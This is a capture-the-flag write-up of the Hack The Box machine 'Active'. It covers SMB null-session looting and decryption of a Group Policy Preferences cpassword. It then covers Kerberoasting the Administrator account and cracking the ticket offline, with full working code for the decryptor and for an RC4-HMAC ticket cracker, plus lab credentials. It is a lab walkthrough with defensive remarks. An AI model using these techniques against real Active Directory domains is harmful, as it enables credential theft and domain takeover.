```
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2018-08-08 07:32:39Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49169/tcp open  msrpc        Microsoft Windows RPC
49171/tcp open  msrpc        Microsoft Windows RPC
49182/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
```
As an alternative to nmap for Kerberos user enumeration we can use the Metasploit module auxiliary/gather/kerberos_enumusers, which sends an AS-REQ per candidate name and tells existing principals from unknown ones by the KDC's error code:
```
[+] 10.10.10.100:88 - User: "administrator" is present
[+] 10.10.10.100:88 - User: "dc" is present
[-] 10.10.10.100:88 - User: "guest" account disabled or locked out
```
First we downloaded the whole Replication share, which is readable with a null session (empty username and empty password):

```shell
smbclient //10.10.10.100/Replication -U ""%"" -c 'prompt OFF;recurse ON;mget *'
```
The active.htb folder contains a lot of files and subfolders, but searching the tree for "pass" with ripgrep turns up a cpassword attribute in Groups.xml, i.e. a Group Policy Preferences (GPP) password. GPP encrypts that value with AES-256-CBC and a fixed key that Microsoft itself published, so it can be decrypted offline:
```python
from Crypto.Cipher import AES  # pycryptodome; key = the public GPP AES key, cpassword = the base64-decoded blob

o = AES.new(key, AES.MODE_CBC, b"\x00" * 16).decrypt(cpassword)
print(o[:-o[-1]].decode("utf-16-le"))  # strip PKCS#7 padding; the plaintext is UTF-16LE
```
The decrypted cpassword gives us the GPP password for the account named in the same Groups.xml entry, active.htb\SVC_TGS: GPPstillStandingStrong2k18.
That XML should only exist in the SYSVOL share, which requires a domain account to read. The sysadmin created the Replication share as a backup copy with anonymous access, so the cpassword (and with it the SVC_TGS credential) became readable by anyone on the network, compromising the security of the entire domain. Note that even SYSVOL alone is not safe: since the AES key is public, any domain user can decrypt every cpassword in Group Policy, which is why Microsoft removed the ability to set passwords through GPP with MS14-025.
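Here is the decryption written out in full, as an added example that is not the writeup's own script: it restores the base64 padding that GPP strips from cpassword, decrypts with the published key and an all-zero IV, removes the PKCS#7 padding, decodes the UTF-16LE plaintext, and walks a Groups.xml pulling every cpassword it finds (the same attribute also appears in ScheduledTasks, Services, DataSources and Drives preference files, which this handles as well). The Groups.xml below is constructed to mirror the attributes the page reports, and its cpassword is generated by the script itself rather than copied from the box; the script uses pycryptodome if present and falls back to the cryptography package.

```python
"""Decrypt Group Policy Preferences cpassword values from a Groups.xml.

Added example; not code from the original writeup. GPP_KEY is the AES-256
key Microsoft published for GPP (public, which is the whole weakness).
The Groups.xml and its cpassword below are constructed for this demo.
"""
import base64
import xml.etree.ElementTree as ET

GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = b"\x00" * 16  # GPP uses a zero IV


def _aes_cbc(data: bytes, decrypt: bool) -> bytes:
    """Raw AES-256-CBC with the GPP key, via pycryptodome or cryptography."""
    try:
        from Crypto.Cipher import AES
        c = AES.new(GPP_KEY, AES.MODE_CBC, GPP_IV)
        return c.decrypt(data) if decrypt else c.encrypt(data)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        c = Cipher(algorithms.AES(GPP_KEY), modes.CBC(GPP_IV))
        op = c.decryptor() if decrypt else c.encryptor()
        return op.update(data) + op.finalize()


def decrypt_cpassword(cpassword: str) -> str:
    """cpassword is base64 with '=' padding stripped; plaintext is UTF-16LE + PKCS#7."""
    cpassword += "=" * (-len(cpassword) % 4)
    raw = _aes_cbc(base64.b64decode(cpassword), decrypt=True)
    pad = raw[-1]
    if not 1 <= pad <= 16 or raw[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword?")
    return raw[:-pad].decode("utf-16-le")


def encrypt_cpassword(password: str) -> str:
    """Inverse of decrypt_cpassword; used here only to build the demo Groups.xml."""
    pt = password.encode("utf-16-le")
    pad = 16 - len(pt) % 16
    ct = _aes_cbc(pt + bytes([pad]) * pad, decrypt=False)
    return base64.b64encode(ct).decode().rstrip("=")


def extract_gpp_credentials(xml_text: str) -> list:
    """Return (account, password) for every element carrying a cpassword.

    Groups.xml keeps the account in userName; ScheduledTasks/Services/
    DataSources/Drives keep it in runAs or accountName.
    """
    found = []
    for el in ET.fromstring(xml_text).iter():
        cp = el.get("cpassword")
        if cp is None:
            continue
        account = el.get("userName") or el.get("runAs") or el.get("accountName") or "?"
        found.append((account, decrypt_cpassword(cp)))
    return found


# Constructed Groups.xml mirroring the attributes the writeup found; the
# cpassword is generated here, it is not the value from the box.
_DEMO_CPASSWORD = encrypt_cpassword("GPPstillStandingStrong2k18")
SAMPLE_GROUPS_XML = f"""<Groups clsid="{{3125E937-EB16-4b4c-9934-544FC6D24D26}}">
  <User clsid="{{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}}" name="active.htb\\SVC_TGS">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="{_DEMO_CPASSWORD}"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for account, password in extract_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{account}: {password}")
```

The padding check matters in practice: a cpassword that is not really GPP-encrypted (or a truncated one) decrypts to garbage whose last byte is rarely valid PKCS#7, so the error is caught before an exotic UTF-16 decode error hides the real cause.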
Now that we have a username and password we can rerun the nullinux tool, this time authenticated, to gather more information:
```
[*] Enumerating: \\10.10.10.100\NETLOGON
    .                        D        0  Wed Aug  8 12:02:39 2018
    ..                       D        0  Wed Aug  8 12:02:39 2018

[*] Enumerating: \\10.10.10.100\Replication
    .                        D        0  Sat Jul 21 12:37:44 2018
    ..                       D        0  Sat Jul 21 12:37:44 2018
    active.htb               D        0  Sat Jul 21 12:37:44 2018

[*] Enumerating: \\10.10.10.100\SYSVOL
    .                        D        0  Wed Aug  8 12:02:40 2018
    ..                       D        0  Wed Aug  8 12:02:40 2018
    active.htb               D        0  Wed Jul 18 20:48:57 2018
    GHDLXVKonw               D        0  Wed Aug  8 12:02:34 2018
    vHDsdRgOTM               D        0  Wed Aug  8 12:02:40 2018
    WlCneTZBAq               D        0  Wed Aug  8 12:01:57 2018

[*] Enumerating: \\10.10.10.100\Users
    .                       DR        0  Sat Jul 21 16:39:20 2018
    ..                      DR        0  Sat Jul 21 16:39:20 2018
    Administrator            D        0  Mon Jul 16 12:14:21 2018
    All Users              DHS        0  Tue Jul 14 07:06:44 2009
    Default                DHR        0  Tue Jul 14 08:38:21 2009
    Default User           DHS        0  Tue Jul 14 07:06:44 2009
    desktop.ini            AHS      174  Tue Jul 14 06:57:55 2009
    Public                  DR        0  Tue Jul 14 06:57:55 2009
    SVC_TGS                  D        0  Sat Jul 21 17:16:32 2018

[*] Enumerating Domain Information for: 10.10.10.100
    [+] Domain Name: ACTIVE
    [+] Domain SID: S-1-5-21-405608879-3187717380-1996298813
```
CrackMapExec's gpp_password module, run with the SVC_TGS credentials, finds the same Groups.xml under the Default Domain Policy GUID in SYSVOL and confirms the credential:

```
SMB         10.10.10.100    445    DC    [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC    [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18
GPP_PASS... 10.10.10.100    445    DC    [+] Found SYSVOL share
GPP_PASS... 10.10.10.100    445    DC    [*] Searching for potential XML files containing passwords
GPP_PASS... 10.10.10.100    445    DC    [*] Found active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.10.100    445    DC    [+] Found credentials in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.10.100    445    DC    Password: GPPstillStandingStrong2k18
GPP_PASS... 10.10.10.100    445    DC    userName: active.htb\SVC_TGS
GPP_PASS... 10.10.10.100    445    DC    noChange: 1
GPP_PASS... 10.10.10.100    445    DC    neverExpires: 1
GPP_PASS... 10.10.10.100    445    DC    description:
GPP_PASS... 10.10.10.100    445    DC    acctDisabled: 0
GPP_PASS... 10.10.10.100    445    DC    newName:
GPP_PASS... 10.10.10.100    445    DC    changeLogon: 0
GPP_PASS... 10.10.10.100    445    DC    action: U
GPP_PASS... 10.10.10.100    445    DC    fullName:
```
Since the username SVC_TGS hints at Kerberos TGS (service ticket) requests, we used impacket's GetUserSPNs.py with the SVC_TGS credentials against the KDC on port 88. The script lists the user accounts that have an SPN registered, which here includes Administrator, and requests a service ticket for that SPN; any domain user may do this. The ticket's encrypted part is protected with the NT hash of the account that owns the SPN, so it can be attacked offline (Kerberoasting). GetUserSPNs.py prints it as a $krb5tgs$23$ line, which is hashcat mode 13100 (Kerberos 5 TGS-REP etype 23, RC4-HMAC), so with this hash we can start cracking with hashcat -m 13100.
The password for Administrator is Ticketmaster1968. We can validate those credentials with CrackMapExec and at the same time see what permissions Administrator has over the shares:

```shell
cme smb 10.10.10.100 -u "Administrator" -p "Ticketmaster1968" --shares
```
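To make explicit what hashcat -m 13100 verifies for each guess, here is an added example (not code from the original writeup) that builds a $krb5tgs$23$ line for a constructed Administrator ticket and cracks it with a tiny wordlist. Per guess it derives the NT hash (MD4 over the UTF-16LE password), the RFC 4757 keys K1 = HMAC-MD5(NT, key usage 2) and K3 = HMAC-MD5(K1, checksum), RC4-decrypts the ticket body with K3 and compares HMAC-MD5(K1, plaintext) with the checksum carried in the hash. The realm ACTIVE.HTB and the Administrator account come from the page; the SPN cifs/dc.active.htb, the ticket body and the random confounder are made up for the demo. MD4 is implemented inline because hashlib's md4 is disabled on many OpenSSL 3 builds.

```python
"""What hashcat -m 13100 checks per guess: RFC 4757 RC4-HMAC (etype 23)
verification of a Kerberos TGS-REP ticket's encrypted part.

Added example, not code from the original writeup. The ticket is constructed
here with a chosen password so everything runs offline; realm and account
come from the page, the SPN and ticket body are made up.
"""
import hashlib
import hmac
import os
import struct

KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the TGS-REP ticket enc-part
MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 of the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & MASK32 & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, x in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[x] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate register roles for the next step
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _k1(key, usage)
    data = os.urandom(8) + plaintext  # 8-byte confounder, made up here
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    return checksum + rc4(hmac.new(k1, checksum, hashlib.md5).digest(), data)


def make_krb5tgs_hash(user: str, realm: str, spn: str, password: str, ticket_body: bytes) -> str:
    """impacket/hashcat line format: $krb5tgs$23$*user$realm$spn*$checksum$edata2."""
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TICKET, ticket_body)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def check_guess(krb5tgs: str, password: str) -> bool:
    """One hashcat 13100 trial: derive K1/K3 from the guess, decrypt, compare HMAC."""
    parts = krb5tgs.split("$")
    if parts[1] != "krb5tgs" or parts[2] != "23":
        raise ValueError("only etype 23 (RC4-HMAC) is handled here")
    checksum, edata = bytes.fromhex(parts[-2]), bytes.fromhex(parts[-1])
    k1 = _k1(nt_hash(password), KEY_USAGE_TICKET)
    data = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), edata)
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def crack(krb5tgs: str, wordlist):
    """Return the first password in wordlist that verifies, else None."""
    return next((pw for pw in wordlist if check_guess(krb5tgs, pw)), None)


if __name__ == "__main__":
    # Constructed ticket: realm/account as on the page, SPN and body made up.
    h = make_krb5tgs_hash("Administrator", "ACTIVE.HTB", "cifs/dc.active.htb",
                          "Ticketmaster1968", b"EncTicketPart (constructed)")
    print(h[:60] + "...")
    print("cracked:", crack(h, ["Password1", "Summer2018", "Ticketmaster1968"]))
```

Nothing in the check involves the KDC: once the ticket is in hand the only protection left is the password strength of the account that owns the SPN. That is why service accounts with SPNs need long random passwords (or group managed service accounts), and why forcing AES-only Kerberos encryption on them helps, since the AES etypes (hashcat modes 19600/19700) cost far more per guess than this RC4-HMAC path.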
Now we can access the C$ share and read the root flag.